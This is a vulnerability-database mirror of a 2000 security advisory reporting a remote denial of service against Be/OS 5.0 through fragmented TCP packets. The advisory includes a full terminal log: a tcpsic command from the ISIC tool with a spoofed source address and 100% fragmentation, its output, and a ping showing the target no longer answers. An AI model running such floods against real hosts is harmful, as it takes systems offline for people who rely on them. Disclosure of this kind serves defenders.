Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

beos5-dos.txt

🗓️ 19 May 2000 00:00:00Reported by Visi0nType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 14 Views

Be/OS 5.0 vulnerable to remote Denial of Service via tcp fragmentation, no fix available yet.

Code
` AUX Technologies.  
  
Security Advisory.  
  
Advisory: Remote Denial of Service against Be/OS.  
  
Release Date: May 15, 2000.  
  
Status: No fix yet.  
  
Vulnerable version: Be/OS Personal 5.0 build feb 212000 4:43:00.  
  
Vendor: Contacted and no answer.  
  
Shoutz: AUX PPL(braSil rulez), dethl0k, cryonic, drk, grafspee and  
mike frantzen(isic), a "fuck you" to sgi (stole codes is bad for your health).  
  
Description:  
  
The Be/OS Operating System version 5.0 have a vulnerability in the  
tcp fragmentation which can lock up the entire system, needing a cold  
reset to back work. The bug can be reproduced using the ISIC-0.05.  
  
[root@localhost isic-0.05]# ping 10.0.1.46  
PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data.  
64 bytes from 10.0.1.46: icmp_seq=0 ttl=255 time=7.3 ms  
64 bytes from 10.0.1.46: icmp_seq=1 ttl=255 time=1.8 ms  
  
--- 10.0.1.46 ping statistics ---  
2 packets transmitted, 2 packets received, 0% packet loss  
round-trip min/avg/max = 1.8/4.5/7.3 ms  
[root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0  
-I0 -T0 -u0 -t0  
Compiled against Libnet 1.0.1b  
Installing Signal Handlers.  
Seeding with 31337  
No Maximum traffic limiter  
Using random source ports.  
Using random destination ports.  
Bad IP Version = 0% IP Opts Pcnt = 0%  
Frag'd Pcnt = 100% Urg Pcnt = 0%  
Bad TCP Cksm = 0% TCP Opts Pcnt = 0%  
  
1000 @ 1802.8 pkts/sec and 1174.6 k/s  
2000 @ 1636.8 pkts/sec and 1105.5 k/s  
3000 @ 2110.2 pkts/sec and 1396.4 k/s  
4000 @ 1689.1 pkts/sec and 1105.4 k/s  
Caught signal 2  
Used random seed 31337  
Wrote 5002 packets in 2.74s @ 1824.48 pkts/s  
[root@localhost isic-0.05]# ping 10.0.1.46  
PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data.  
  
--- 10.0.1.46 ping statistics ---  
11 packets transmitted, 0 packets received, 100% packet loss  
[root@localhost isic-0.05]#  
  
===============================================================================  
visi0n  
AUX Technologies  
[www.aux-tech.org]  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 May 2000 00:00Current
7.4High risk
Vulners AI Score7.4
remote denial of servicebe/os 5.0tcp fragmentationno fixcold reset needed
14